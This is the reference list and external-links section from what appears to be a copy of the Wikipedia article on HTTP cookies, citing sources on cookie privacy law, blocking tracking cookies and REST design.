  29. ^ "Directive2002/58/EC of the European Parliament and of the Council of 12 July2002 concerning the processing of personal data and the protection ofprivacy in the electronic communications sector". eur-lex.europa.eu. http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:32002L0058:EN:NOT. Retrieved 2010-03-16. 
  30. ^ "Cookie Settings for Opera 9". OperaWiki.info. http://operawiki.info/NewCookieSettings. Retrieved 2008-01-20. 
  31. ^ "Disabling third party cookies". Mozilla.com. http://support.mozilla.com/en-US/kb/Disabling+third+party+cookies. 
  32. ^ Pegoraro, Rob (July 17, 2005). "How to Block Tracking Cookies". Washington Post. p. F07. http://www.washingtonpost.com/wp-dyn/content/article/2005/07/16/AR2005071600111.html. Retrieved 2009-01-04. 
  33. ^ Mozilla AddOns, TACO, the Targeted Advertising Cookie Opt-Out Firefox extension
  34. ^ Wired Hack Obtains 9 Bogus Certificates for Prominent Websites
  35. ^ Roy Fielding (2000). "Fielding Dissertation: CHAPTER 6: Experience and Evaluation". http://roy.gbiv.com/pubs/dissertation/evaluation.htm. Retrieved 2010-10-14. 
  36. ^ Tilkov, Stefan (July 2, 2008). "REST Anti-Patterns". InfoQ. http://www.infoq.com/articles/rest-anti-patterns. Retrieved 2009-01-04. 
  37. ^ "ThomasFrank.se". ThomasFrank.se. http://www.thomasfrank.se/sessionvars.html. Retrieved 2010-05-22. 

This article was originally based on material from the Free On-line Dictionary of Computing, which is licensed under the GFDL.

[edit] External links

  • RFC 6265 – the official specification for HTTP cookies
  • How Internet Cookies Work at HowStuffWorks
  • Information About Cookies from Microsoft
  • Cookies at the Electronic Privacy Information Center (EPIC)
  • Taking the Byte Out of Cookies: Privacy, Consent, and the Web (PDF)
  • Web handbook – Cookies from Delivery And Transformation Group, Cabinet Office, UK
  • Cookie-Based Counting Overstates Size of Web Site Audiences at ComScore
  • Don’t Tread on Our Cookies – The Web Privacy Manifesto at PBS
  • Mozilla Knowledgebase: Cookies

 

Retrieved from "http://en.wikipedia.org/wiki/HTTP_cookie"
原创粉丝点击